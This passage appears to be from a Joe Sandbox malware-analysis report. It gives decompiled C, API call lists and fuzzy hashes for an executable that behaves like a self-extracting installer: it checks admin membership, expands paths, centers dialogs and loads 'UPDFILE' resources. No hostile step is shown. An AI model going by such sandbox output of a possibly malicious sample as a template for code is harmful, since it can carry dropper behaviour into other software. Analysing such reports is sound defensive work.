                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3785188418-0
                                                                                                                                                                                                                                            • Opcode ID: f61249711ae0ca172162997c3f9c493125508eaae56054a3a4ab591920176c35
                                                                                                                                                                                                                                            • Instruction ID: e7c354eeecb0eac7bcecf55f03de144189e80e11bee0505d6b49e3669d2d2fb2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f61249711ae0ca172162997c3f9c493125508eaae56054a3a4ab591920176c35
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8111A279246322FBDB615B38AC0CB6A3AB4FB46760F004611FDD59A188DB7A9141C746
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E010D17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0x10da288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x010d17f6
                                                                                                                                                                                                                                            0x010d17fd
                                                                                                                                                                                                                                            0x010d1805
                                                                                                                                                                                                                                            0x010d180b
                                                                                                                                                                                                                                            0x010d180d
                                                                                                                                                                                                                                            0x010d1815
                                                                                                                                                                                                                                            0x010d1818
                                                                                                                                                                                                                                            0x010d1820
                                                                                                                                                                                                                                            0x010d1824
                                                                                                                                                                                                                                            0x010d182c
                                                                                                                                                                                                                                            0x010d1832
                                                                                                                                                                                                                                            0x010d1837
                                                                                                                                                                                                                                            0x010d1851
                                                                                                                                                                                                                                            0x010d1854
                                                                                                                                                                                                                                            0x010d185d
                                                                                                                                                                                                                                            0x010d1862
                                                                                                                                                                                                                                            0x010d186c
                                                                                                                                                                                                                                            0x010d1872
                                                                                                                                                                                                                                            0x010d1877
                                                                                                                                                                                                                                            0x010d187e
                                                                                                                                                                                                                                            0x010d187e
                                                                                                                                                                                                                                            0x010d1883
                                                                                                                                                                                                                                            0x010d1883
                                                                                                                                                                                                                                            0x010d185d
                                                                                                                                                                                                                                            0x010d188a
                                                                                                                                                                                                                                            0x010d188a
                                                                                                                                                                                                                                            0x010d18a2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010D18DD), ref: 010D181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010D182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(010D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010D18DD), ref: 010D1855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,010D18DD), ref: 010D1883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,010D18DD), ref: 010D188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: 59e87de73d36ee5632968a36a5a67421e357c07ea05833e216dc49000e2459cc
                                                                                                                                                                                                                                            • Instruction ID: 6911a63cad9597fe5b53701bd0f8797e374e17b008e9d01c5ed974faa547f455
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59e87de73d36ee5632968a36a5a67421e357c07ea05833e216dc49000e2459cc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87116375F01309EBEB109FA5EC4AABEBFB8EF44701F100169FA45E7241DB7599008B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E010D2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0x10d9a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E010D1680(_t65, E010D17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E010D65E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E010D1680(_t65, E010D17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x010d2aac
                                                                                                                                                                                                                                            0x010d2ab7
                                                                                                                                                                                                                                            0x010d2abc
                                                                                                                                                                                                                                            0x010d2abe
                                                                                                                                                                                                                                            0x010d2ac3
                                                                                                                                                                                                                                            0x010d2ac6
                                                                                                                                                                                                                                            0x010d2ac9
                                                                                                                                                                                                                                            0x010d2ace
                                                                                                                                                                                                                                            0x010d2ae6
                                                                                                                                                                                                                                            0x010d2bdc
                                                                                                                                                                                                                                            0x010d2bdc
                                                                                                                                                                                                                                            0x010d2be0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2af2
                                                                                                                                                                                                                                            0x010d2afc
                                                                                                                                                                                                                                            0x010d2b00
                                                                                                                                                                                                                                            0x010d2b05
                                                                                                                                                                                                                                            0x010d2b05
                                                                                                                                                                                                                                            0x010d2b0b
                                                                                                                                                                                                                                            0x010d2bca
                                                                                                                                                                                                                                            0x010d2bd1
                                                                                                                                                                                                                                            0x010d2b11
                                                                                                                                                                                                                                            0x010d2b18
                                                                                                                                                                                                                                            0x010d2b26
                                                                                                                                                                                                                                            0x010d2b99
                                                                                                                                                                                                                                            0x010d2bc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2b9b
                                                                                                                                                                                                                                            0x010d2bae
                                                                                                                                                                                                                                            0x010d2bb3
                                                                                                                                                                                                                                            0x010d2bb5
                                                                                                                                                                                                                                            0x010d2bb5
                                                                                                                                                                                                                                            0x010d2bb8
                                                                                                                                                                                                                                            0x010d2bb8
                                                                                                                                                                                                                                            0x010d2bba
                                                                                                                                                                                                                                            0x010d2bbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2bb8
                                                                                                                                                                                                                                            0x010d2b28
                                                                                                                                                                                                                                            0x010d2b2e
                                                                                                                                                                                                                                            0x010d2b33
                                                                                                                                                                                                                                            0x010d2b39
                                                                                                                                                                                                                                            0x010d2b3c
                                                                                                                                                                                                                                            0x010d2b3c
                                                                                                                                                                                                                                            0x010d2b3e
                                                                                                                                                                                                                                            0x010d2b3f
                                                                                                                                                                                                                                            0x010d2b55
                                                                                                                                                                                                                                            0x010d2b5d
                                                                                                                                                                                                                                            0x010d2b64
                                                                                                                                                                                                                                            0x010d2b64
                                                                                                                                                                                                                                            0x010d2b7a
                                                                                                                                                                                                                                            0x010d2b7f
                                                                                                                                                                                                                                            0x010d2b81
                                                                                                                                                                                                                                            0x010d2b81
                                                                                                                                                                                                                                            0x010d2b84
                                                                                                                                                                                                                                            0x010d2b84
                                                                                                                                                                                                                                            0x010d2b86
                                                                                                                                                                                                                                            0x010d2b87
                                                                                                                                                                                                                                            0x010d2bbf
                                                                                                                                                                                                                                            0x010d2bc1
                                                                                                                                                                                                                                            0x010d2bc1
                                                                                                                                                                                                                                            0x010d2b26
                                                                                                                                                                                                                                            0x010d2bda
                                                                                                                                                                                                                                            0x010d2bda
                                                                                                                                                                                                                                            0x010d2be6
                                                                                                                                                                                                                                            0x010d2be6
                                                                                                                                                                                                                                            0x010d2bf8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010D2AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 010D2AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 010D2B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 010D2B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 010D2B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 010D2BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: 58dc4d5e6137a29ac59ac4ff64c1cc32aa7059256d1ca200806aff194ac9d9f9
                                                                                                                                                                                                                                            • Instruction ID: 60d7d86120d8d08918df4a71e9fa53ba7b73dafe168394525f39c6f1d90ec185
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58dc4d5e6137a29ac59ac4ff64c1cc32aa7059256d1ca200806aff194ac9d9f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D4118346043469FDF669F388854AFD7FA99F46320F0440DAECC287202DF7A4A86CB60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E010D43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            0x010d43d0
                                                                                                                                                                                                                                            0x010d43d8
                                                                                                                                                                                                                                            0x010d43df
                                                                                                                                                                                                                                            0x010d43e6
                                                                                                                                                                                                                                            0x010d43ec
                                                                                                                                                                                                                                            0x010d43f1
                                                                                                                                                                                                                                            0x010d4400
                                                                                                                                                                                                                                            0x010d4403
                                                                                                                                                                                                                                            0x010d440b
                                                                                                                                                                                                                                            0x010d4420
                                                                                                                                                                                                                                            0x010d4429
                                                                                                                                                                                                                                            0x010d4437
                                                                                                                                                                                                                                            0x010d4444
                                                                                                                                                                                                                                            0x010d4447
                                                                                                                                                                                                                                            0x010d444d
                                                                                                                                                                                                                                            0x010d4454
                                                                                                                                                                                                                                            0x010d445b
                                                                                                                                                                                                                                            0x010d4460
                                                                                                                                                                                                                                            0x010d4461
                                                                                                                                                                                                                                            0x010d4467
                                                                                                                                                                                                                                            0x010d446f
                                                                                                                                                                                                                                            0x010d4473
                                                                                                                                                                                                                                            0x010d4473
                                                                                                                                                                                                                                            0x010d4463
                                                                                                                                                                                                                                            0x010d4463
                                                                                                                                                                                                                                            0x010d4463
                                                                                                                                                                                                                                            0x010d447a
                                                                                                                                                                                                                                            0x010d4481
                                                                                                                                                                                                                                            0x010d4484
                                                                                                                                                                                                                                            0x010d448a
                                                                                                                                                                                                                                            0x010d4492
                                                                                                                                                                                                                                            0x010d4496
                                                                                                                                                                                                                                            0x010d4496
                                                                                                                                                                                                                                            0x010d4486
                                                                                                                                                                                                                                            0x010d4486
                                                                                                                                                                                                                                            0x010d4486
                                                                                                                                                                                                                                            0x010d44b8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 010D43F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 010D440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 010D4423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 010D442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 010D443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 010D4447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010D44A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: a33d349861f8dd773c7d2e40bd2adca0baafa087f95f1b9ec30c6bdf644cb6a2
                                                                                                                                                                                                                                            • Instruction ID: a39bc5c6ce436d90c1c018c0fc32957bfef0124b8f8d874e0ab644b788be2fe8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a33d349861f8dd773c7d2e40bd2adca0baafa087f95f1b9ec30c6bdf644cb6a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0314C36F01219AFCB14CFB8D9889EEBBB5EB89310F154169F845F3244DA35AD45CBA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E010D6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E010D171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0x10da288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
